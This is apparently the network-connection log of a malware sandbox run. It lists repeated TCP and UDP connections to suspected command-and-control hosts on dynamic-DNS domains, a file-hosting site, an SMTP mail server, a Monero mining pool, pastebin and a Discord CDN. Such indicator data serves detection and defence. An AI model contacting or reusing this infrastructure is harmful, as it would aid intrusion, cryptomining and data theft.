CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.215.85.63:7020 datastream.myvnc.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.215.85.63:5225 datastream.myvnc.com tcp
US 129.153.80.87:8855 tcp
US 107.175.229.139:8087 tcp
RU 91.215.85.63:5225 datastream.myvnc.com tcp
RU 62.173.141.114:445 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.107.42.13:443 onedrive.live.com tcp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.215.85.63:2718 datastream.myvnc.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.107.43.13:443 onedrive.live.com tcp
US 107.175.229.139:8087 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.215.85.63:2718 datastream.myvnc.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 center.onthewifi.com udp
RU 91.215.85.63:8118 center.onthewifi.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 107.175.229.139:8087 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 listpoints.online udp
US 8.8.8.8:53 retghrtgwtrgtg.bounceme.net udp
RU 91.215.85.63:3839 retghrtgwtrgtg.bounceme.net tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.215.85.63:8118 retghrtgwtrgtg.bounceme.net tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.215.85.63:7020 retghrtgwtrgtg.bounceme.net tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.107.42.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
US 107.175.229.139:8087 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.215.85.63:5225 retghrtgwtrgtg.bounceme.net tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.107.43.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.215.85.63:2718 retghrtgwtrgtg.bounceme.net tcp
US 107.175.229.139:8087 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 listpoints.online udp
RU 91.215.85.63:3839 retghrtgwtrgtg.bounceme.net tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.215.85.63:8118 retghrtgwtrgtg.bounceme.net tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.215.85.63:7020 retghrtgwtrgtg.bounceme.net tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 107.175.229.139:8087 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 129.153.80.87:8855 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.107.42.13:443 onedrive.live.com tcp
US 8.8.8.8:53 listpoints.online udp
RU 91.215.85.63:3839 retghrtgwtrgtg.bounceme.net tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
RU 91.215.85.63:5225 retghrtgwtrgtg.bounceme.net tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.215.85.63:7020 retghrtgwtrgtg.bounceme.net tcp
US 13.107.43.13:443 onedrive.live.com tcp
US 107.175.229.139:8087 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.215.85.63:5225 retghrtgwtrgtg.bounceme.net tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.215.85.63:2718 retghrtgwtrgtg.bounceme.net tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 107.175.229.139:8087 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.215.85.63:2718 retghrtgwtrgtg.bounceme.net tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.215.85.63:8118 retghrtgwtrgtg.bounceme.net tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.215.85.63:8118 retghrtgwtrgtg.bounceme.net tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.107.42.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 107.175.229.139:8087 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.107.43.13:443 onedrive.live.com tcp
US 8.8.8.8:53 listpoints.online udp
RU 91.215.85.63:3839 retghrtgwtrgtg.bounceme.net tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 107.175.229.139:8087 tcp
RU 91.215.85.63:3839 retghrtgwtrgtg.bounceme.net tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.215.85.63:7020 retghrtgwtrgtg.bounceme.net tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
RU 91.215.85.63:7020 retghrtgwtrgtg.bounceme.net tcp
US 8.8.8.8:53 datastream.myvnc.com udp
RU 91.215.85.63:5225 datastream.myvnc.com tcp
US 107.175.229.139:8087 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.107.42.13:443 onedrive.live.com tcp
RU 91.215.85.63:2718 datastream.myvnc.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 129.153.80.87:8855 tcp
RU 91.215.85.63:5225 datastream.myvnc.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.215.85.63:8118 datastream.myvnc.com tcp
US 107.175.229.139:8087 tcp
US 13.107.43.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 listpoints.online udp
RU 91.215.85.63:3839 datastream.myvnc.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 107.175.229.139:8087 tcp
RU 91.215.85.63:2718 datastream.myvnc.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.215.85.63:7020 datastream.myvnc.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.107.42.13:443 onedrive.live.com tcp
US 107.175.229.139:8087 tcp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
RU 91.215.85.63:5225 datastream.myvnc.com tcp
RU 91.215.85.63:8118 datastream.myvnc.com tcp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.107.43.13:443 onedrive.live.com tcp
RU 91.215.85.63:2718 datastream.myvnc.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 39.142.81.104.in-addr.arpa udp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 107.175.229.139:8087 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.215.85.63:8118 datastream.myvnc.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 listpoints.online udp
RU 91.215.85.63:3839 datastream.myvnc.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 107.175.229.139:8087 tcp
RU 91.215.85.63:3839 datastream.myvnc.com tcp
DE 178.162.202.48:443 datalake.abuse.ch tcp
DE 178.162.202.48:443 datalake.abuse.ch tcp
RU 91.215.85.63:7020 datastream.myvnc.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.107.42.13:443 onedrive.live.com tcp
RU 91.215.85.63:7020 datastream.myvnc.com tcp
US 129.153.80.87:8855 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.107.43.13:443 onedrive.live.com tcp
US 8.8.8.8:53 onedrive.live.com udp
US 13.107.42.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.215.85.63:5225 datastream.myvnc.com tcp
US 8.8.8.8:53 135.1.85.104.in-addr.arpa udp
RU 91.215.85.63:2718 datastream.myvnc.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 107.175.229.139:8087 tcp
US 8.8.8.8:53 119.110.54.20.in-addr.arpa udp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 25.14.97.104.in-addr.arpa udp
RU 193.37.71.22:80 193.37.71.22 tcp
US 8.8.8.8:53 center.onthewifi.com udp
RU 91.215.85.63:8118 center.onthewifi.com tcp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
RU 91.215.85.63:2718 center.onthewifi.com tcp
RU 185.172.128.100:80 185.172.128.100 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.107.42.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 107.175.229.139:8087 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 listpoints.online udp
US 8.8.8.8:53 retghrtgwtrgtg.bounceme.net udp
RU 91.215.85.63:3839 retghrtgwtrgtg.bounceme.net tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.107.43.13:443 onedrive.live.com tcp
RU 91.215.85.63:8118 retghrtgwtrgtg.bounceme.net tcp
RU 193.37.71.22:80 193.37.71.22 tcp
US 107.175.229.139:8087 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.215.85.63:7020 retghrtgwtrgtg.bounceme.net tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.215.85.63:5225 retghrtgwtrgtg.bounceme.net tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
US 107.175.229.139:8087 tcp
RU 91.215.85.63:2718 retghrtgwtrgtg.bounceme.net tcp
US 13.107.42.13:443 onedrive.live.com tcp
US 8.8.8.8:53 listpoints.online udp
RU 91.215.85.63:3839 retghrtgwtrgtg.bounceme.net tcp
RU 91.215.85.63:8118 retghrtgwtrgtg.bounceme.net tcp
US 13.107.43.13:443 onedrive.live.com tcp
US 129.153.80.87:8855 tcp
US 107.175.229.139:8087 tcp
RU 193.37.71.22:80 193.37.71.22 tcp
RU 91.215.85.63:7020 retghrtgwtrgtg.bounceme.net tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 listpoints.online udp
RU 91.215.85.63:3839 retghrtgwtrgtg.bounceme.net tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 194.49.94.152:50500 tcp
US 107.175.229.139:8087 tcp
RU 91.215.85.63:7020 retghrtgwtrgtg.bounceme.net tcp
RU 193.37.71.22:80 193.37.71.22 tcp
US 13.107.42.13:443 onedrive.live.com tcp
RU 91.215.85.63:5225 retghrtgwtrgtg.bounceme.net tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 107.175.229.139:8087 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.107.43.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.215.85.63:2718 retghrtgwtrgtg.bounceme.net tcp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.215.85.63:5225 retghrtgwtrgtg.bounceme.net tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.215.85.63:8118 retghrtgwtrgtg.bounceme.net tcp
US 107.175.229.139:8087 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
US 8.8.8.8:53 listpoints.online udp
RU 91.215.85.63:3839 retghrtgwtrgtg.bounceme.net tcp
US 13.107.42.13:443 onedrive.live.com tcp
RU 91.215.85.63:2718 retghrtgwtrgtg.bounceme.net tcp
US 107.175.229.139:8087 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.215.85.63:7020 retghrtgwtrgtg.bounceme.net tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.107.43.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 129.153.80.87:8855 tcp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 107.175.229.139:8087 tcp
US 8.8.8.8:53 datastream.myvnc.com udp
RU 91.215.85.63:5225 datastream.myvnc.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.215.85.63:8118 datastream.myvnc.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.215.85.63:2718 datastream.myvnc.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 194.49.94.152:50500 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 107.175.229.139:8087 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
US 13.107.42.13:443 onedrive.live.com tcp
RU 91.215.85.63:8118 datastream.myvnc.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.107.43.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 107.175.229.139:8087 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 listpoints.online udp
RU 91.215.85.63:3839 datastream.myvnc.com tcp
RU 91.215.85.63:3839 datastream.myvnc.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.215.85.63:7020 datastream.myvnc.com tcp
RU 91.215.85.63:7020 datastream.myvnc.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 107.175.229.139:8087 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.215.85.63:5225 datastream.myvnc.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.107.42.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
US 107.175.229.139:8087 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.215.85.63:2718 datastream.myvnc.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.107.43.13:443 onedrive.live.com tcp
RU 91.215.85.63:5225 datastream.myvnc.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.215.85.63:8118 datastream.myvnc.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
US 129.153.80.87:8855 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 mail.zqamcx.com udp
GB 78.110.166.82:587 mail.zqamcx.com tcp
US 8.8.8.8:53 listpoints.online udp
US 8.8.8.8:53 retghrtgwtrgtg.bounceme.net udp
US 8.8.8.8:53 files.catbox.moe udp
RU 91.215.85.63:3839 retghrtgwtrgtg.bounceme.net tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 gservicese.com udp
RU 91.215.85.63:2718 gservicese.com tcp
US 8.8.8.8:53 82.166.110.78.in-addr.arpa udp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 107.175.229.139:8087 tcp
US 13.107.42.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 194.49.94.152:50500 tcp
GB 78.110.166.82:587 mail.zqamcx.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
US 8.8.8.8:53 listpoints.click udp
RU 91.215.85.63:7020 listpoints.click tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.107.43.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 datastream.myvnc.com udp
RU 91.215.85.63:5225 datastream.myvnc.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 107.175.229.139:8087 tcp
US 8.8.8.8:53 center.onthewifi.com udp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.215.85.63:8118 center.onthewifi.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.215.85.63:2718 center.onthewifi.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 107.175.229.139:8087 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.215.85.63:8118 center.onthewifi.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.107.42.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.107.43.13:443 onedrive.live.com tcp
US 8.8.8.8:53 listpoints.online udp
RU 91.215.85.63:3839 center.onthewifi.com tcp
US 107.175.229.139:8087 tcp
RU 91.215.85.63:3839 center.onthewifi.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 49ddc5da-17a4-40a8-ac72-a4299ebd1726.uuid.dumperstats.org udp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.215.85.63:7020 center.onthewifi.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.215.85.63:7020 center.onthewifi.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 107.175.229.139:8087 tcp
US 129.153.80.87:8855 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.215.85.63:5225 center.onthewifi.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.107.42.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.215.85.63:5225 center.onthewifi.com tcp
RU 91.215.85.63:2718 center.onthewifi.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 107.175.229.139:8087 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
US 194.49.94.152:50500 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.107.43.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.215.85.63:8118 center.onthewifi.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.215.85.63:2718 center.onthewifi.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 139.229.175.107.in-addr.arpa udp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 listpoints.online udp
RU 91.215.85.63:3839 center.onthewifi.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 107.175.229.139:8087 tcp
US 8.8.8.8:53 geoplugin.net udp
NL 178.237.33.50:80 geoplugin.net tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.215.85.63:8118 center.onthewifi.com tcp
US 8.8.8.8:53 50.33.237.178.in-addr.arpa udp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.215.85.63:7020 center.onthewifi.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.107.42.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 server11.dumperstats.org udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 8.8.8.8:53 stun.l.google.com udp
BG 185.82.216.111:443 server11.dumperstats.org tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 74.125.128.127:19302 stun.l.google.com udp
US 8.8.8.8:53 walkinglate.com udp
CA 108.181.20.37:443 files.catbox.moe tcp
US 188.114.96.0:443 walkinglate.com tcp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.215.85.63:5225 center.onthewifi.com tcp
US 8.8.8.8:53 127.128.125.74.in-addr.arpa udp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.107.43.13:443 onedrive.live.com tcp
US 8.8.8.8:53 233.135.159.162.in-addr.arpa udp
US 8.8.8.8:53 111.216.82.185.in-addr.arpa udp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.215.85.63:2718 center.onthewifi.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 listpoints.online udp
RU 91.215.85.63:3839 center.onthewifi.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
RU 91.215.85.63:8118 center.onthewifi.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 129.153.80.87:8855 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 listpoints.click udp
RU 91.215.85.63:7020 listpoints.click tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.107.42.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 listpoints.online udp
US 8.8.8.8:53 retghrtgwtrgtg.bounceme.net udp
RU 91.215.85.63:3839 retghrtgwtrgtg.bounceme.net tcp
US 8.8.8.8:53 server11.dumperstats.org udp
CA 108.181.20.37:443 files.catbox.moe tcp
BG 185.82.216.111:443 server11.dumperstats.org tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 xmr-eu1.nanopool.org udp
FR 212.47.253.124:14433 xmr-eu1.nanopool.org tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
US 8.8.8.8:53 124.253.47.212.in-addr.arpa udp
US 13.107.43.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 pastebin.com udp
US 172.67.34.170:443 pastebin.com tcp
US 194.49.94.152:50500 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
DE 51.68.190.80:14433 xmr-eu1.nanopool.org tcp
US 8.8.8.8:53 datastream.myvnc.com udp
RU 91.215.85.63:7020 datastream.myvnc.com tcp
RU 91.215.85.63:5225 datastream.myvnc.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 170.34.67.172.in-addr.arpa udp
US 8.8.8.8:53 80.190.68.51.in-addr.arpa udp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.215.85.63:5225 datastream.myvnc.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 gservicese.com udp
RU 91.215.85.63:2718 gservicese.com tcp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.215.85.63:2718 gservicese.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.107.42.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 center.onthewifi.com udp
